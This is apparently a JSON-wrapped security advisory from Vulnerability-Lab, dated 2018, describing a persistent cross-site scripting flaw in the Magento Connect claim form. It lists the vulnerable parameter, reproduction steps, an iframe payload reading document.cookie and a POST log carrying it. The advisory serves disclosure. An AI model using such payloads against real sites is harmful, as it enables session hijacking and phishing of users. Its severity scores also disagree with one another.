{"sourceData": "Document Title:\r\n===============\r\nMagento Connect T1 - (Claim) Persistent Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1469\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-01-08\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1469\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n4\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nCross Site Scripting - Persistent\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n1.000\u20ac - 2.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nMagento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed \r\nby Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned \r\nsolely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model \r\nto store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.\r\n\r\nOur team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting \r\nthis data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability \r\ninside our system, please tell us right away.\r\n\r\n( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Research Team discovered an application-side cross site scripting web vulnerabilityin the Magento Connect web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-01-08: Non-Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nEbay Inc.\r\nProduct: Magento - Connect Web Application 2015 Q2\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nRestricted authentication (user/moderator) - User privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nLow User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nBug Bounty Program\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nAn application-side cross site scripting web vulnerability has been discovered in the official Magento Connect web-application.\r\nThe vulnerability allows remote attackers to inject own script code on the application-side of the affected application module.\r\n\r\nThe vulnerability is located in the `claim%5Bclaimed_extension_url` value of the `magento-connect/claim/claim/new/` module.\r\nRemote attackers are able to inject own script code on the application-side of the service to compromise user/moderator/admin \r\nsession data. The request method to inject is POST and the attack vector is located on the application-side of the affected module.\r\n\r\nExploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. \r\nSuccessful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source \r\nand persistent manipulation of affected or connected application modules (api).\r\n\r\nRequest Method(s):\r\n\t\t\t\t\t\t[+] POST\r\n\r\nVulnerable Service(s):\r\n\t\t\t\t\t\t[+] Magento Connect\r\n\t\t\t\t\t\t\r\nVulnerable Module(s):\r\n\t\t\t\t\t\t[+] magento-connect/claim/claim/new/\r\n\t\t\t\t\t\t\r\nVulnerable Parameter(s):\r\n\t\t\t\t\t\t[+] claim%5Bclaimed_extension_url\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe persistent vulnerability in the exception handling can be exploited by remote attackers without privileged application user account and low user interaction.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\nManual steps to reproduce the vulnerability ...\r\n1. Surf to http://www.magentocommerce.com/magento-connect/claim/claim/new/ \r\n2. In the Enter a link to the extension on Connect you believe violates our terms. write ...\r\nNote: Payload \"><iframe src=\"javascript:alert(document.cookie)\"></iframe>\r\n3. Successful reproduce of the security vulnerability!\r\n\r\nPOC: Exception Handling\r\n<div class=\"m_input_box w85p error\"><!-- add class 'error' to show error message-->\r\n <label for=\"link\" class=\"required\">Enter a link to the extension on Connect you believe violates our terms. </label>\r\n <input id=\"link\" name=\"claim[claimed_extension_url]\" value=\"\" type=\"text\"><iframe src=\"javascript:alert(document.cookie)\"></iframe>\">\r\n <span class=\"error_txt\">Required field. Example: http://www.magentocommerce.com/magento-connect/extension-name</span>\r\n </div>\r\n\r\n\r\n--- PoC Session Logs [POST] ---\r\nPOST http://www.magentocommerce.com/magento-connect/claim/claim/new/ \r\nLoad Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[71413] \r\nMime Type[text/html]\r\n Request Headers:\r\n Host[www.magentocommerce.com]\r\n User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[en-US,en;q=0.5]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://www.magentocommerce.com/magento-connect/claim/claim/new/]\r\n Cookie\r\n X-Forwarded-For[8.8.8.8]\r\n Connection[keep-alive]\r\n Post Data:\r\n claim%5Bclaimed_extension_url%5D[%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3C%2Fiframe%3E]\r\n claim%5Boriginal_extension_url%5D[]\r\n claim%5Bdescription%5D[]\r\n claim%5Bdigital_signature%5D[]\r\n Response Headers:\r\n Server[nginx]\r\n Content-Type[text/html; charset=UTF-8]\r\n Connection[keep-alive]\r\n P3P[CP=\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"]\r\n Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]\r\n Pragma[no-cache]\r\n Set-Cookie[frontend=4edl2ftb4c6qoe11lieojciaj7; path=/magento-connect/; domain=www.magentocommerce.com]\r\n Content-Length[71413]\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security rsik of the application-side input validation web vulnerability is estimated as medium. (CVSS 3.8)\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, \r\nincluding the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, \r\nincluding direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised \r\nof the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing \r\nlimitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.\r\n\r\nDomains: www.vulnerability-lab.com \t\t- www.vuln-lab.com \t\t\t\t\t\t- www.evolution-sec.com\r\nSection: magazine.vulnerability-lab.com \t- vulnerability-lab.com/contact.php \t\t\t\t- evolution-sec.com/contact\r\nSocial:\t twitter.com/vuln_lab\t\t- facebook.com/VulnerabilityLab \t\t\t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \t- vulnerability-lab.com/rss/rss_upcoming.php \t\t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php \t- vulnerability-lab.com/register.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically \r\nredistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or \r\nits suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific \r\nauthors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "description": "", "reporter": "Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab", "href": "http://www.vulnerability-lab.com/get_content.php?id=1469", "type": "vulnerlab", "viewCount": 8, "references": [], "lastseen": "2019-07-10T16:42:10", "published": "2018-01-08T00:00:00", "cvelist": [], "id": "VULNERLAB:1469", "modified": "2018-01-08T00:00:00", "title": "Magento Connect T1 - (Claim) Persistent Vulnerability", "edition": 4, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"dependencies": {"references": [], "modified": "2019-07-10T16:42:10", "rev": 2}, "score": {"value": -0.0, "vector": "NONE", "modified": "2019-07-10T16:42:10", "rev": 2}, "vulnersScore": -0.0}, "scheme": null}